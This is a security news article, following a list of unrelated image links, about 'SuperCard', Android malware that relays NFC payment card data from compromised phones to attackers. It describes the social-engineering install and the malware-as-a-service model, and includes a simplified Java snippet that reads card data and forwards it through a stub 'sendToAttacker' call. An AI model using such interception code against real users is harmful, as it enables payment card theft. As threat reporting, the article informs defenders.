![How to Create Your Own AI Toolkit with Taylor Radey [MAICON 2025 Speaker Series]](https://www.marketingaiinstitute.com/hubfs/MAICON-Speaker_Series-Taylor.png)
![[The AI Show Episode 153]: OpenAI Releases o3-Pro, Disney Sues Midjourney, Altman: “Gentle Singularity” Is Here, AI and Jobs & News Sites Getting Crushed by AI Search](https://www.marketingaiinstitute.com/hubfs/ep%20153%20cover.png)
![[DEALS] Internxt Cloud Storage Lifetime Subscription (20TB) (89% off) & Other Deals Up To 98% Off – Offers End Soon!](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![GrandChase tier list of the best characters available [June 2025]](https://media.pocketgamer.com/artwork/na-33057-1637756796/grandchase-ios-android-3rd-anniversary.jpg?#)
_Brain_light_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![[Fixed] How to Recover Unsaved Word Document on Windows 10/11](https://www.pcworld.com/wp-content/uploads/2025/06/How-to-recover-unsaved-word-document-main.png?#)
![Apple Shares New Shot on iPhone Film: 'Big Man' [Video]](https://www.iclarified.com/images/news/97654/97654/97654-640.jpg)
![Apple Still Finalizing Key Parts of Its Foldable iPhone [Kuo]](https://www.iclarified.com/images/news/97655/97655/97655-640.jpg)
![Apple's F1 Camera Rig Revealed [Video]](https://www.iclarified.com/images/news/97651/97651/97651-640.jpg)
New SuperCard Malware Using Hacked Android Phones to Relay Data from Users Payment Cards to Attackers Device
In a concerning development for mobile payment security, cybersecurity experts have identified a sophisticated new malware strain named “SuperCard” that exploits Android devices to steal payment card data. This malicious application, a modified version of the legitimate NFCGate program, intercepts Near Field Communication (NFC) traffic during contactless payments, effectively turning compromised phones into relay devices […] The post New SuperCard Malware Using Hacked Android Phones to Relay Data from Users Payment Cards to Attackers Device appeared first on Cyber Security News.
In a concerning development for mobile payment security, cybersecurity experts have identified a sophisticated new malware strain named “SuperCard” that exploits Android devices to steal payment card data.
This malicious application, a modified version of the legitimate NFCGate program, intercepts Near Field Communication (NFC) traffic during contactless payments, effectively turning compromised phones into relay devices that transmit sensitive financial information directly to attackers.
First detected in April 2025 by Italian security firm Cleafy, SuperCard initially targeted European banking customers before expanding its reach.
The malware operates as part of a well-organized “malware-as-a-service” (MaaS) platform called SuperCard X, which cybercriminals can subscribe to through underground Telegram channels.
Unlike previous NFC-exploiting threats, SuperCard offers subscribers sophisticated customer support services, reflecting the increasingly professional nature of today’s cybercrime ecosystem.
Habr researchers identified that the attack begins with social engineering tactics, where victims receive messages from seemingly legitimate sources urging them to install what appears to be a useful application.
Once installed, the malware requests permissions to access the device’s NFC module and payment systems, establishing itself as the default payment handler.
// Simplified representation of SuperCard's NFC interception mechanism
@Override
public void onTagDiscovered(Tag tag) {
IsoDep isoDep = IsoDep.get(tag);
try {
isoDep.connect();
byte[] command = {0x00, 0xA4, 0x04, 0x00, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x42, 0x10, 0x10};
byte[] result = isoDep.transceive(command);
// Intercept and forward card data to C2 server
sendToAttacker(result);
} catch (Exception e) {
Log.e("SuperCard", "Error communicating with card", e);
}
}Infection Mechanism and Data Exfiltration
The sophistication of SuperCard lies in its multi-stage infection process. After installation, the malware remains dormant until it detects a payment transaction.
When a user attempts to make a contactless payment, SuperCard activates in the background, capturing the transaction data while allowing the legitimate payment to proceed.
This stealth approach ensures victims remain unaware of the compromise while their card details are transmitted to command-and-control servers.
F6 security analysts report that SuperCard has already compromised over 175,000 Android devices in Russia alone, with damages exceeding 432 million rubles in the first quarter of 2025.
The malware’s rapid global spread demonstrates the evolving threat landscape for mobile payment systems, requiring users to exercise extreme caution when installing applications, even those that appear legitimate.
Power up early threat detection, escalation, and mitigation with ANY.RUN’s Threat Intelligence Lookup. Get 50 trial searches.
The post New SuperCard Malware Using Hacked Android Phones to Relay Data from Users Payment Cards to Attackers Device appeared first on Cyber Security News.
